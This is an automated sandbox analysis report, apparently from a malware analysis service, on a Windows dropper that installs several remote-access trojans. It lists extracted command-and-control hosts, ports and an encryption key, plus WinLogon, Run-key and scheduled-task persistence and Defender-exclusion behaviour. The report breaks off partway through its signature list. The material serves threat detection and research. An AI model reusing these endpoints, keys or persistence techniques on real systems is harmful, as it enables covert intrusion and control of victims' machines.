Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
11-08-2024 06:59
General
-
Target
713e742f7314ca8d684137f996540b4b.exe
-
Size
6.7MB
-
MD5
713e742f7314ca8d684137f996540b4b
-
SHA1
1d88ed5170efab2d32d83341be56e1b9f6720d7c
-
SHA256
41bd2718e24b2367c4a29a6eb94045d4ce1e29b4d6ca99d7d2d8b14e316e18f5
-
SHA512
df373f00d609666811494d31c48f030e15155ddd4c3ccd4f0ef734a0eb4bee074244e8bb73263f06edca3cef60db37f7f603e98b7c040b6741dbcf8270fa90e4
-
SSDEEP
98304:tbqknnTC8vHM8aKN+3v4FOjfU2TNe7vWL26AaNeWgPhlmVqkQ7XSKUR83B:tzO8vH04FmMnG4S03B
Malware Config
Extracted
asyncrat
0.5.8
Default
thing-wine.gl.at.ply.gg:55280
EFhpy3TPM7sR
-
delay
3
-
install
true
-
install_file
Ass.exe
-
install_folder
%Temp%
Extracted
xworm
projects-pf.gl.at.ply.gg:55284
wiz.bounceme.net:6000
-
Install_directory
%ProgramData%
-
install_file
USB.exe
Extracted
quasar
1.4.1
Office04
businesses-eric.gl.at.ply.gg:55282
ebfbd873-38ee-4f7b-bfe9-2b77cdff1c45
-
encryption_key
361A99FCBAEDCD5C706B5E52C37C90BFB4E13FB2
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
1000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral2/files/0x0007000000023412-52.dat family_xworm behavioral2/memory/4560-57-0x0000000000E00000-0x0000000000E1A000-memory.dmp family_xworm behavioral2/memory/4560-260-0x000000001C310000-0x000000001C31E000-memory.dmp family_xworm -
Modifies WinLogon for persistence 2 TTPs 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\", \"C:\\Users\\Public\\explorer.exe\", \"C:\\Windows\\fr-FR\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\uk-UA\\Registry.exe\", \"C:\\Program Files\\Common Files\\Services\\sihost.exe\", \"C:\\Windows\\Panther\\actionqueue\\Client.exe\", \"C:\\Windows\\appcompat\\SearchApp.exe\", \"C:\\Program Files\\Windows Defender\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\timeout.exe\", \"C:\\ChainPortsessionbroker\\sppsvc.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\", \"C:\\Users\\Public\\explorer.exe\", \"C:\\Windows\\fr-FR\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\uk-UA\\Registry.exe\", \"C:\\Program Files\\Common Files\\Services\\sihost.exe\", \"C:\\Windows\\Panther\\actionqueue\\Client.exe\", \"C:\\Windows\\appcompat\\SearchApp.exe\", \"C:\\Program Files\\Windows Defender\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\timeout.exe\", \"C:\\ChainPortsessionbroker\\sppsvc.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\ChainPortsessionbroker\\dllhost.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\", \"C:\\Users\\Public\\explorer.exe\", \"C:\\Windows\\fr-FR\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\uk-UA\\Registry.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\", \"C:\\Users\\Public\\explorer.exe\", \"C:\\Windows\\fr-FR\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\uk-UA\\Registry.exe\", \"C:\\Program Files\\Common Files\\Services\\sihost.exe\", \"C:\\Windows\\Panther\\actionqueue\\Client.exe\", \"C:\\Windows\\appcompat\\SearchApp.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\", \"C:\\Users\\Public\\explorer.exe\", \"C:\\Windows\\fr-FR\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\uk-UA\\Registry.exe\", \"C:\\Program Files\\Common Files\\Services\\sihost.exe\", \"C:\\Windows\\Panther\\actionqueue\\Client.exe\", \"C:\\Windows\\appcompat\\SearchApp.exe\", \"C:\\Program Files\\Windows Defender\\RuntimeBroker.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\", \"C:\\Users\\Public\\explorer.exe\", \"C:\\Windows\\fr-FR\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\uk-UA\\Registry.exe\", \"C:\\Program Files\\Common Files\\Services\\sihost.exe\", \"C:\\Windows\\Panther\\actionqueue\\Client.exe\", \"C:\\Windows\\appcompat\\SearchApp.exe\", \"C:\\Program Files\\Windows Defender\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\timeout.exe\", \"C:\\ChainPortsessionbroker\\sppsvc.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\", \"C:\\Users\\Public\\explorer.exe\", \"C:\\Windows\\fr-FR\\upfc.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\", \"C:\\Users\\Public\\explorer.exe\", \"C:\\Windows\\fr-FR\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\uk-UA\\Registry.exe\", \"C:\\Program Files\\Common Files\\Services\\sihost.exe\", \"C:\\Windows\\Panther\\actionqueue\\Client.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\", \"C:\\Users\\Public\\explorer.exe\", \"C:\\Windows\\fr-FR\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\uk-UA\\Registry.exe\", \"C:\\Program Files\\Common Files\\Services\\sihost.exe\", \"C:\\Windows\\Panther\\actionqueue\\Client.exe\", \"C:\\Windows\\appcompat\\SearchApp.exe\", \"C:\\Program Files\\Windows Defender\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\timeout.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\", \"C:\\Users\\Public\\explorer.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\", \"C:\\Users\\Public\\explorer.exe\", \"C:\\Windows\\fr-FR\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\uk-UA\\Registry.exe\", \"C:\\Program Files\\Common Files\\Services\\sihost.exe\"" Fontsession.exe -
Process spawned unexpected child process 42 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2284 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4604 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 996 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2712 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 932 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2244 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1624 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4624 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4844 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4880 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2396 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4296 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2176 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 512 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2536 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4836 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1436 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4416 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4820 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4516 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3816 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1412 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3532 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4260 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3672 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4584 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4944 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2116 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1936 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3212 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4048 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4148 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2596 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 264 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1260 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2916 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4204 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2416 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4072 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3592 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4648 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2928 632 schtasks.exe 106 -
Quasar payload 3 IoCs
resource yara_rule behavioral2/files/0x0007000000023411-34.dat family_quasar behavioral2/memory/3568-56-0x0000000000400000-0x0000000000AB3000-memory.dmp family_quasar behavioral2/memory/1408-59-0x00000000001D0000-0x00000000004F4000-memory.dmp family_quasar -
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x000800000002340b-4.dat family_asyncrat -
resource yara_rule behavioral2/files/0x000700000002340f-15.dat dcrat behavioral2/memory/3568-56-0x0000000000400000-0x0000000000AB3000-memory.dmp dcrat behavioral2/files/0x0007000000023415-128.dat dcrat behavioral2/memory/4832-135-0x0000000000190000-0x00000000003E2000-memory.dmp dcrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4704 powershell.exe 3096 powershell.exe 1420 powershell.exe -
Disables Task Manager via registry modification
-
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation OrcusStub.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation WizWormStub.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation AsyncStub.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation Fontsession.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation Fontsession.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation 713e742f7314ca8d684137f996540b4b.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation DCRatStub.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WizWormStub.lnk WizWormStub.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WizWormStub.lnk WizWormStub.exe -
Executes dropped EXE 14 IoCs
pid Process 3212 AsyncStub.exe 4048 DCRatStub.exe 1736 OrcusStub.exe 1408 QuasarStub.exe 4560 WizWormStub.exe 8 WindowsInput.exe 4832 Fontsession.exe 1516 Client.exe 1740 AudioDriver.exe 2428 Fontsession.exe 964 Ass.exe 4836 dllhost.exe 4908 WizWormStub.exe 1844 WizWormStub.exe -
Adds Run key to start application 2 TTPs 29 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\ChainPortsessionbroker\\dllhost.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WizWormStub = "C:\\ProgramData\\WizWormStub.exe" WizWormStub.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Windows\\fr-FR\\upfc.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Windows\\fr-FR\\upfc.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\ChainPortsessionbroker\\sppsvc.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Users\\Public\\explorer.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client = "\"C:\\Windows\\Panther\\actionqueue\\Client.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Windows\\appcompat\\SearchApp.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\uk-UA\\Registry.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client = "\"C:\\Windows\\Panther\\actionqueue\\Client.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\timeout = "\"C:\\Recovery\\WindowsRE\\timeout.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files\\Windows Defender\\RuntimeBroker.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Windows\\appcompat\\SearchApp.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\timeout = "\"C:\\Recovery\\WindowsRE\\timeout.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\ChainPortsessionbroker\\smss.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Users\\Public\\explorer.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\ChainPortsessionbroker\\dllhost.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\uk-UA\\Registry.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files\\Windows Defender\\RuntimeBroker.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\ChainPortsessionbroker\\smss.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Program Files\\Common Files\\Services\\sihost.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\ChainPortsessionbroker\\sppsvc.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files\\Crashpad\\attachments\\System.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files\\Crashpad\\attachments\\System.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Program Files\\Common Files\\Services\\sihost.exe\"" Fontsession.exe -
Drops file in System32 directory 8 IoCs
description ioc Process File created C:\Windows\system32\SubDir\Client.exe QuasarStub.exe File opened for modification C:\Windows\system32\SubDir\Client.exe QuasarStub.exe File opened for modification C:\Windows\system32\SubDir QuasarStub.exe File opened for modification C:\Windows\system32\SubDir\Client.exe Client.exe File opened for modification C:\Windows\system32\SubDir Client.exe File created C:\Windows\SysWOW64\WindowsInput.exe OrcusStub.exe File opened for modification C:\Windows\SysWOW64\WindowsInput.InstallLog WindowsInput.exe File created C:\Windows\SysWOW64\WindowsInput.InstallState WindowsInput.exe -
Drops file in Program Files directory 12 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft.NET\RedistList\38384e6a620884 Fontsession.exe File created C:\Program Files\Crashpad\attachments\27d1bcfc3c54e0 Fontsession.exe File created C:\Program Files\Common Files\Services\sihost.exe Fontsession.exe File created C:\Program Files\Common Files\Services\66fc9ff0ee96c2 Fontsession.exe File created C:\Program Files\Windows Defender\RuntimeBroker.exe Fontsession.exe File created C:\Program Files\Windows Defender\9e8d7a4ca61bd9 Fontsession.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\SearchApp.exe Fontsession.exe File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\SearchApp.exe Fontsession.exe File created C:\Program Files\Crashpad\attachments\System.exe Fontsession.exe File created C:\Program Files\ModifiableWindowsApps\services.exe Fontsession.exe File created C:\Program Files (x86)\Windows Photo Viewer\uk-UA\Registry.exe Fontsession.exe File created C:\Program Files (x86)\Windows Photo Viewer\uk-UA\ee2ad38f3d4382 Fontsession.exe -
Drops file in Windows directory 7 IoCs
description ioc Process File created C:\Windows\fr-FR\ea1d8f6d871115 Fontsession.exe File created C:\Windows\Panther\actionqueue\Client.exe Fontsession.exe File created C:\Windows\Panther\actionqueue\5e896533852c8e Fontsession.exe File created C:\Windows\appcompat\SearchApp.exe Fontsession.exe File created C:\Windows\appcompat\38384e6a620884 Fontsession.exe File created C:\Windows\fr-FR\upfc.exe Fontsession.exe File opened for modification C:\Windows\fr-FR\upfc.exe Fontsession.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 713e742f7314ca8d684137f996540b4b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OrcusStub.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AudioDriver.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ass.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AsyncStub.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DCRatStub.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4924 timeout.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings DCRatStub.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings Fontsession.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3904 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 46 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4516 schtasks.exe 3592 schtasks.exe 2176 schtasks.exe 4260 schtasks.exe 1936 schtasks.exe 4880 schtasks.exe 4296 schtasks.exe 1412 schtasks.exe 1260 schtasks.exe 2416 schtasks.exe 4032 schtasks.exe 3816 schtasks.exe 2244 schtasks.exe 1624 schtasks.exe 4836 schtasks.exe 4416 schtasks.exe 4820 schtasks.exe 264 schtasks.exe 2284 schtasks.exe 932 schtasks.exe 2916 schtasks.exe 4204 schtasks.exe 3212 schtasks.exe 4148 schtasks.exe 2928 schtasks.exe 1216 schtasks.exe 4584 schtasks.exe 2116 schtasks.exe 4944 schtasks.exe 4048 schtasks.exe 4072 schtasks.exe 4648 schtasks.exe 4624 schtasks.exe 1436 schtasks.exe 3532 schtasks.exe 2596 schtasks.exe 4604 schtasks.exe 2712 schtasks.exe 4204 schtasks.exe 4844 schtasks.exe 2396 schtasks.exe 512 schtasks.exe 2536 schtasks.exe 3672 schtasks.exe 3404 schtasks.exe 996 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
